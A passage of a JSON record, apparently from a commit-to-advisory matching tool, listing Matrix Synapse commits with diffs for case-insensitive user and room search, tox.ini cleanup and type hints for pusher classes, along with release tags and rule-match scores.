a/synapse/storage/databases/main/__init__.py", + "+++ b/synapse/storage/databases/main/__init__.py", + "@@ -341,8 +341,9 @@ class DataStore(", + "+ # `name` is in database already in lower case", + " if name:", + "- filters.append(\"(name LIKE ? OR displayname LIKE ?)\")", + "- args.extend([\"@%\" + name + \"%:%\", \"%\" + name + \"%\"])", + "+ filters.append(\"(name LIKE ? OR LOWER(displayname) LIKE ?)\")", + "+ args.extend([\"@%\" + name.lower() + \"%:%\", \"%\" + name.lower() + \"%\"])", + " elif user_id:", + " filters.append(\"name LIKE ?\")", + "- args.extend([\"%\" + user_id + \"%\"])", + "+ args.extend([\"%\" + user_id.lower() + \"%\"])", + "diff --git a/synapse/storage/databases/main/room.py b/synapse/storage/databases/main/room.py", + "index 6b89db15c..4650d0689 100644", + "--- a/synapse/storage/databases/main/room.py", + "+++ b/synapse/storage/databases/main/room.py", + "@@ -381,3 +381,3 @@ class RoomWorkerStore(SQLBaseStore):", + " if search_term:", + "- where_statement = \"WHERE state.name LIKE ?\"", + "+ where_statement = \"WHERE LOWER(state.name) LIKE ?\"", + "@@ -388,3 +388,3 @@ class RoomWorkerStore(SQLBaseStore):", + " # before giving it to the database in python instead", + "- search_term = \"%\" + search_term + \"%\"", + "+ search_term = \"%\" + search_term.lower() + \"%\"", + "diff --git a/tests/rest/admin/test_room.py b/tests/rest/admin/test_room.py", + "index ca20bcad0..014c30287 100644", + "--- a/tests/rest/admin/test_room.py", + "+++ b/tests/rest/admin/test_room.py", + "@@ -1052,2 +1052,9 @@ class RoomTestCase(unittest.HomeserverTestCase):", + "+ # Test case insensitive", + "+ _search_test(room_id_1, \"SOMETHING\")", + "+ _search_test(room_id_1, \"THING\")", + "+", + "+ _search_test(room_id_2, \"ELSE\")", + "+ _search_test(room_id_2, \"SE\")", + "+", + " _search_test(None, \"foo\")", + "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", + "index df62317e6..4f379a5e5 100644", + "--- a/tests/rest/admin/test_user.py", + "+++ b/tests/rest/admin/test_user.py", + "@@ -20,2 +20,3 @@ import urllib.parse", + " from binascii import unhexlify", + "+from typing import Optional", + "@@ -468,4 +469,8 @@ class UsersListTestCase(unittest.HomeserverTestCase):", + "- self.register_user(\"user1\", \"pass1\", admin=False)", + "- self.register_user(\"user2\", \"pass2\", admin=False)", + "+ self.user1 = self.register_user(", + "+ \"user1\", \"pass1\", admin=False, displayname=\"Name 1\"", + "+ )", + "+ self.user2 = self.register_user(", + "+ \"user2\", \"pass2\", admin=False, displayname=\"Name 2\"", + "+ )", + "@@ -478,3 +483,16 @@ class UsersListTestCase(unittest.HomeserverTestCase):", + " self.assertEqual(401, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "- self.assertEqual(\"M_MISSING_TOKEN\", channel.json_body[\"errcode\"])", + "+ self.assertEqual(Codes.MISSING_TOKEN, channel.json_body[\"errcode\"])", + "+", + "+ def test_requester_is_no_admin(self):", + "+ \"\"\"", + "+ If the user is not a server admin, an error is returned.", + "+ \"\"\"", + "+ other_user_token = self.login(\"user1\", \"pass1\")", + "+", + "+ request, channel = self.make_request(", + "+ \"GET\", self.url, access_token=other_user_token,", + "+ )", + "+", + "+ self.assertEqual(403, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "+ self.assertEqual(Codes.FORBIDDEN, channel.json_body[\"errcode\"])", + "@@ -495,2 +513,79 @@ class UsersListTestCase(unittest.HomeserverTestCase):", + "+ # Check that all fields are available", + "+ for u in channel.json_body[\"users\"]:", + "+ self.assertIn(\"name\", u)", + "+ self.assertIn(\"is_guest\", u)", + "+ self.assertIn(\"admin\", u)", + "+ self.assertIn(\"user_type\", u)", + "+ self.assertIn(\"deactivated\", u)", + "+ self.assertIn(\"displayname\", u)", + "+ self.assertIn(\"avatar_url\", u)", + "+", + "+ def test_search_term(self):", + "+ \"\"\"Test that searching for a users works correctly\"\"\"", + "+", + "+ def _search_test(", + "+ expected_user_id: Optional[str],", + "+ search_term: str,", + "+ search_field: Optional[str] = \"name\",", + "+ expected_http_code: Optional[int] = 200,", + "+ ):", + "+ \"\"\"Search for a user and check that the returned user's id is a match", + "+", + "+ Args:", + "+ expected_user_id: The user_id expected to be returned by the API. Set", + "+ to None to expect zero results for the search", + "+ search_term: The term to search for user names with", + "+ search_field: Field which is to request: `name` or `user_id`", + "+ expected_http_code: The expected http code for the request", + "+ \"\"\"", + "+ url = self.url + \"?%s=%s\" % (search_field, search_term,)", + "+ request, channel = self.make_request(", + "+ \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "+ )", + "+ self.assertEqual(expected_http_code, channel.code, msg=channel.json_body)", + "+", + "+ if expected_http_code != 200:", + "+ return", + "+", + "+ # Check that users were returned", + "+ self.assertTrue(\"users\" in channel.json_body)", + "+ users = channel.json_body[\"users\"]", + "+", + "+ # Check that the expected number of users were returned", + "+ expected_user_count = 1 if expected_user_id else 0", + "+ self.assertEqual(len(users), expected_user_count)", + "+ self.assertEqual(channel.json_body[\"total\"], expected_user_count)", + "+", + "+ if expected_user_id:", + "+ # Check that the first returned user id is correct", + "+ u = users[0]", + "+ self.assertEqual(expected_user_id, u[\"name\"])", + "+", + "+ # Perform search tests", + "+ _search_test(self.user1, \"er1\")", + "+ _search_test(self.user1, \"me 1\")", + "+", + "+ _search_test(self.user2, \"er2\")", + "+ _search_test(self.user2, \"me 2\")", + "+", + "+ _search_test(self.user1, \"er1\", \"user_id\")", + "+ _search_test(self.user2, \"er2\", \"user_id\")", + "+", + "+ # Test case insensitive", + "+ _search_test(self.user1, \"ER1\")", + "+ _search_test(self.user1, \"NAME 1\")", + "+", + "+ _search_test(self.user2, \"ER2\")", + "+ _search_test(self.user2, \"NAME 2\")", + "+", + "+ _search_test(self.user1, \"ER1\", \"user_id\")", + "+ _search_test(self.user2, \"ER2\", \"user_id\")", + "+", + "+ _search_test(None, \"foo\")", + "+ _search_test(None, \"bar\")", + "+", + "+ _search_test(None, \"foo\", \"user_id\")", + "+ _search_test(None, \"bar\", \"user_id\")", + "+", + "diff --git a/tests/storage/test_main.py b/tests/storage/test_main.py", + "index 7e7f1286d..e9e3bca3b 100644", + "--- a/tests/storage/test_main.py", + "+++ b/tests/storage/test_main.py", + "@@ -50 +50,8 @@ class DataStoreTestCase(unittest.TestCase):", + " self.assertEquals(self.displayname, users.pop()[\"displayname\"])", + "+", + "+ users, total = yield defer.ensureDeferred(", + "+ self.store.get_users_paginate(0, 10, name=\"BC\", guests=False)", + "+ )", + "+", + "+ self.assertEquals(1, total)", + "+ self.assertEquals(self.displayname, users.pop()[\"displayname\"])" + ], + "changed_files": [ + "changelog.d/8931.feature", + "synapse/storage/databases/main/__init__.py", + "synapse/storage/databases/main/room.py", + "tests/rest/admin/test_room.py", + "tests/rest/admin/test_user.py", + "tests/storage/test_main.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8931": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8931, 8931", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8931", + "relevance": 2 + } + ] + }, + { + "commit_id": "f1db20b5a5c403bb6a72026b2478b0ff6ee3aaee", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608245880, + "hunks": 12, + "message": "Clean up tox.ini (#8963) ... and disable coverage tracking for mypy and friends.", + "diff": [ + "diff --git a/changelog.d/8963.misc b/changelog.d/8963.misc", + "new file mode 100644", + "index 000000000..495d89e8e", + "--- /dev/null", + "+++ b/changelog.d/8963.misc", + "@@ -0,0 +1 @@", + "+Clean up tox.ini file; disable coverage checking for non-test runs.", + "diff --git a/mypy.ini b/mypy.ini", + "index 190420402..0518d3f1a 100644", + "--- a/mypy.ini", + "+++ b/mypy.ini", + "@@ -9,2 +9,7 @@ mypy_path = stubs", + " warn_unreachable = True", + "+", + "+# To find all folders that pass mypy you run:", + "+#", + "+# find synapse/* -type d -not -name __pycache__ -exec bash -c \"mypy '{}' > /dev/null\" \\; -print", + "+", + " files =", + "diff --git a/tox.ini b/tox.ini", + "index c23267682..8e8b49529 100644", + "--- a/tox.ini", + "+++ b/tox.ini", + "@@ -9,3 +9,5 @@ deps =", + " coverage", + "- coverage-enable-subprocess", + "+", + "+ # this is pinned since it's a bit of an obscure package.", + "+ coverage-enable-subprocess==1.0", + "@@ -25,6 +27,2 @@ deps =", + "-setenv =", + "- PYTHONDONTWRITEBYTECODE = no_byte_code", + "- COVERAGE_PROCESS_START = {toxinidir}/.coveragerc", + "-", + " [testenv]", + "@@ -34,8 +32,8 @@ extras = all, test", + "-whitelist_externals =", + "- sh", + "-", + " setenv =", + "- {[base]setenv}", + "+ # use a postgres db for tox environments with \"-postgres\" in the name", + "+ # (see https://tox.readthedocs.io/en/3.20.1/config.html#factors-and-factor-conditional-settings)", + " postgres: SYNAPSE_POSTGRES = 1", + "+", + "+ # this is used by .coveragerc to refer to the top of our tree.", + " TOP={toxinidir}", + "@@ -45,5 +43,17 @@ passenv = *", + " commands =", + "- /usr/bin/find \"{toxinidir}\" -name '*.pyc' -delete", + "- # Add this so that coverage will run on subprocesses", + "- {envbindir}/coverage run \"{envbindir}/trial\" {env:TRIAL_FLAGS:} {posargs:tests} {env:TOXSUFFIX:}", + "+ # the \"env\" invocation enables coverage checking for sub-processes. This is", + "+ # particularly important when running trial with `-j`, since that will make", + "+ # it run tests in a subprocess, whose coverage would otherwise not be", + "+ # tracked. (It also makes an explicit `coverage run` command redundant.)", + "+ #", + "+ # (See https://coverage.readthedocs.io/en/coverage-5.3/subprocess.html.", + "+ # Note that the `coverage.process_startup()` call is done by", + "+ # `coverage-enable-subprocess`.)", + "+ #", + "+ # we use \"env\" rather than putting a value in `setenv` so that it is not", + "+ # inherited by other tox environments.", + "+ #", + "+ # keep this in sync with the copy in `testenv:py35-old`.", + "+ #", + "+ /usr/bin/env COVERAGE_PROCESS_START={toxinidir}/.coveragerc \"{envbindir}/trial\" {env:TRIAL_FLAGS:} {posargs:tests} {env:TOXSUFFIX:}", + "@@ -82,6 +92,5 @@ deps =", + " coverage", + "- coverage-enable-subprocess", + "+ coverage-enable-subprocess==1.0", + " commands =", + "- /usr/bin/find \"{toxinidir}\" -name '*.pyc' -delete", + " # Make all greater-thans equals so we test the oldest version of our direct", + "@@ -94,3 +103,7 @@ commands =", + "- {envbindir}/coverage run \"{envbindir}/trial\" {env:TRIAL_FLAGS:} {posargs:tests} {env:TOXSUFFIX:}", + "+ # we have to duplicate the command from `testenv` rather than refer to it", + "+ # as `{[testenv]commands}`, because we run on ubuntu xenial, which has", + "+ # tox 2.3.1, and https://github.com/tox-dev/tox/issues/208.", + "+ #", + "+ /usr/bin/env COVERAGE_PROCESS_START={toxinidir}/.coveragerc \"{envbindir}/trial\" {env:TRIAL_FLAGS:} {posargs:tests} {env:TOXSUFFIX:}", + "@@ -159,5 +172 @@ extras = all,mypy", + " commands = mypy", + "-", + "-# To find all folders that pass mypy you run:", + "-#", + "-# find synapse/* -type d -not -name __pycache__ -exec bash -c \"mypy '{}' > /dev/null\" \\; -print" + ], + "changed_files": [ + "changelog.d/8963.misc", + "mypy.ini", + "tox.ini" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8963": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8963, 8963", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8963", + "relevance": 2 + } + ] + }, + { + "commit_id": "92d87c68824c17e02a8d9e7ca4f9c44b78426cfb", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607353178, + "hunks": 86, + "message": "Add type hints for HTTP and email pushers. (#8880)", + "diff": [ + "diff --git a/changelog.d/8880.misc b/changelog.d/8880.misc", + "new file mode 100644", + "index 000000000..4ff0b94b9", + "--- /dev/null", + "+++ b/changelog.d/8880.misc", + "@@ -0,0 +1 @@", + "+Add type hints to push module.", + "diff --git a/mypy.ini b/mypy.ini", + "index 7ee0dd4b3..59144be46 100644", + "--- a/mypy.ini", + "+++ b/mypy.ini", + "@@ -57,3 +57,6 @@ files =", + " synapse/notifier.py,", + "+ synapse/push/emailpusher.py,", + "+ synapse/push/httppusher.py,", + " synapse/push/mailer.py,", + "+ synapse/push/pusher.py,", + " synapse/push/pusherpool.py,", + "diff --git a/synapse/push/__init__.py b/synapse/push/__init__.py", + "index e462fb2e1..3d2e87483 100644", + "--- a/synapse/push/__init__.py", + "+++ b/synapse/push/__init__.py", + "@@ -15,2 +15,52 @@", + "+import abc", + "+from typing import TYPE_CHECKING, Any, Dict, Optional", + "+", + "+from synapse.types import RoomStreamToken", + "+", + "+if TYPE_CHECKING:", + "+ from synapse.app.homeserver import HomeServer", + "+", + "+", + "+class Pusher(metaclass=abc.ABCMeta):", + "+ def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any]):", + "+ self.hs = hs", + "+ self.store = self.hs.get_datastore()", + "+ self.clock = self.hs.get_clock()", + "+", + "+ self.pusher_id = pusherdict[\"id\"]", + "+ self.user_id = pusherdict[\"user_name\"]", + "+ self.app_id = pusherdict[\"app_id\"]", + "+ self.pushkey = pusherdict[\"pushkey\"]", + "+", + "+ # This is the highest stream ordering we know it's safe to process.", + "+ # When new events arrive, we'll be given a window of new events: we", + "+ # should honour this rather than just looking for anything higher", + "+ # because of potential out-of-order event serialisation. This starts", + "+ # off as None though as we don't know any better.", + "+ self.max_stream_ordering = None # type: Optional[int]", + "+", + "+ @abc.abstractmethod", + "+ def on_new_notifications(self, max_token: RoomStreamToken) -> None:", + "+ raise NotImplementedError()", + "+", + "+ @abc.abstractmethod", + "+ def on_new_receipts(self, min_stream_id: int, max_stream_id: int) -> None:", + "+ raise NotImplementedError()", + "+", + "+ @abc.abstractmethod", + "+ def on_started(self, have_notifs: bool) -> None:", + "+ \"\"\"Called when this pusher has been started.", + "+", + "+ Args:", + "+ should_check_for_notifs: Whether we should immediately", + "+ check for push to send. Set to False only if it's known there", + "+ is nothing to send", + "+ \"\"\"", + "+ raise NotImplementedError()", + "+", + "+ @abc.abstractmethod", + "+ def on_stop(self) -> None:", + "+ raise NotImplementedError()", + "+", + "diff --git a/synapse/push/emailpusher.py b/synapse/push/emailpusher.py", + "index c6763971e..64a35c199 100644", + "--- a/synapse/push/emailpusher.py", + "+++ b/synapse/push/emailpusher.py", + "@@ -16,3 +16,5 @@", + " import logging", + "+from typing import TYPE_CHECKING, Any, Dict, List, Optional", + "+from twisted.internet.base import DelayedCall", + " from twisted.internet.error import AlreadyCalled, AlreadyCancelled", + "@@ -20,4 +22,9 @@ from twisted.internet.error import AlreadyCalled, AlreadyCancelled", + " from synapse.metrics.background_process_metrics import run_as_background_process", + "+from synapse.push import Pusher", + "+from synapse.push.mailer import Mailer", + " from synapse.types import RoomStreamToken", + "+if TYPE_CHECKING:", + "+ from synapse.app.homeserver import HomeServer", + "+", + " logger = logging.getLogger(__name__)", + "@@ -48,3 +55,3 @@ INCLUDE_ALL_UNREAD_NOTIFS = False", + "-class EmailPusher:", + "+class EmailPusher(Pusher):", + " \"\"\"", + "@@ -56,4 +63,4 @@ class EmailPusher:", + "- def __init__(self, hs, pusherdict, mailer):", + "- self.hs = hs", + "+ def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any], mailer: Mailer):", + "+ super().__init__(hs, pusherdict)", + " self.mailer = mailer", + "@@ -61,13 +68,7 @@ class EmailPusher:", + " self.store = self.hs.get_datastore()", + "- self.clock = self.hs.get_clock()", + "- self.pusher_id = pusherdict[\"id\"]", + "- self.user_id = pusherdict[\"user_name\"]", + "- self.app_id = pusherdict[\"app_id\"]", + " self.email = pusherdict[\"pushkey\"]", + " self.last_stream_ordering = pusherdict[\"last_stream_ordering\"]", + "- self.timed_call = None", + "- self.throttle_params = None", + "-", + "- # See httppusher", + "- self.max_stream_ordering = None", + "+ self.timed_call = None # type: Optional[DelayedCall]", + "+ self.throttle_params = {} # type: Dict[str, Dict[str, int]]", + "+ self._inited = False", + "@@ -75,3 +76,3 @@ class EmailPusher:", + "- def on_started(self, should_check_for_notifs):", + "+ def on_started(self, should_check_for_notifs: bool) -> None:", + " \"\"\"Called when this pusher has been started.", + "@@ -79,3 +80,3 @@ class EmailPusher:", + " Args:", + "- should_check_for_notifs (bool): Whether we should immediately", + "+ should_check_for_notifs: Whether we should immediately", + " check for push to send. Set to False only if it's known there", + "@@ -86,3 +87,3 @@ class EmailPusher:", + "- def on_stop(self):", + "+ def on_stop(self) -> None:", + " if self.timed_call:", + "@@ -94,3 +95,3 @@ class EmailPusher:", + "- def on_new_notifications(self, max_token: RoomStreamToken):", + "+ def on_new_notifications(self, max_token: RoomStreamToken) -> None:", + " # We just use the minimum stream ordering and ignore the vector clock", + "@@ -108,3 +109,3 @@ class EmailPusher:", + "- def on_new_receipts(self, min_stream_id, max_stream_id):", + "+ def on_new_receipts(self, min_stream_id: int, max_stream_id: int) -> None:", + " # We could wake up and cancel the timer but there tend to be quite a", + "@@ -114,3 +115,3 @@ class EmailPusher:", + "- def on_timer(self):", + "+ def on_timer(self) -> None:", + " self.timed_call = None", + "@@ -118,3 +119,3 @@ class EmailPusher:", + "- def _start_processing(self):", + "+ def _start_processing(self) -> None:", + " if self._is_processing:", + "@@ -124,3 +125,3 @@ class EmailPusher:", + "- def _pause_processing(self):", + "+ def _pause_processing(self) -> None:", + " \"\"\"Used by tests to temporarily pause processing of events.", + "@@ -132,3 +133,3 @@ class EmailPusher:", + "- def _resume_processing(self):", + "+ def _resume_processing(self) -> None:", + " \"\"\"Used by tests to resume processing of events after pausing.", + "@@ -139,3 +140,3 @@ class EmailPusher:", + "- async def _process(self):", + "+ async def _process(self) -> None:", + " # we should never get here if we are already processing", + "@@ -146,3 +147,3 @@ class EmailPusher:", + "- if self.throttle_params is None:", + "+ if not self._inited:", + " # this is our first loop: load up the throttle params", + "@@ -151,2 +152,3 @@ class EmailPusher:", + " )", + "+ self._inited = True", + "@@ -165,3 +167,3 @@ class EmailPusher:", + "- async def _unsafe_process(self):", + "+ async def _unsafe_process(self) -> None:", + " \"\"\"", + "@@ -172,6 +174,8 @@ class EmailPusher:", + " start = 0 if INCLUDE_ALL_UNREAD_NOTIFS else self.last_stream_ordering", + "- fn = self.store.get_unread_push_actions_for_user_in_range_for_email", + "- unprocessed = await fn(self.user_id, start, self.max_stream_ordering)", + "+ assert self.max_stream_ordering is not None", + "+ unprocessed = await self.store.get_unread_push_actions_for_user_in_range_for_email(", + "+ self.user_id, start, self.max_stream_ordering", + "+ )", + "- soonest_due_at = None", + "+ soonest_due_at = None # type: Optional[int]", + "@@ -232,3 +236,5 @@ class EmailPusher:", + "- async def save_last_stream_ordering_and_success(self, last_stream_ordering):", + "+ async def save_last_stream_ordering_and_success(", + "+ self, last_stream_ordering: Optional[int]", + "+ ) -> None:", + " if last_stream_ordering is None:", + "@@ -250,3 +256,3 @@ class EmailPusher:", + "- def seconds_until(self, ts_msec):", + "+ def seconds_until(self, ts_msec: int) -> float:", + " secs = (ts_msec - self.clock.time_msec()) / 1000", + "@@ -254,3 +260,3 @@ class EmailPusher:", + "- def get_room_throttle_ms(self, room_id):", + "+ def get_room_throttle_ms(self, room_id: str) -> int:", + " if room_id in self.throttle_params:", + "@@ -260,3 +266,3 @@ class EmailPusher:", + "- def get_room_last_sent_ts(self, room_id):", + "+ def get_room_last_sent_ts(self, room_id: str) -> int:", + " if room_id in self.throttle_params:", + "@@ -266,3 +272,3 @@ class EmailPusher:", + "- def room_ready_to_notify_at(self, room_id):", + "+ def room_ready_to_notify_at(self, room_id: str) -> int:", + " \"\"\"", + "@@ -270,4 +276,6 @@ class EmailPusher:", + " for the given room", + "- Returns: The timestamp when we are next allowed to send an email notif", + "- for this room", + "+", + "+ 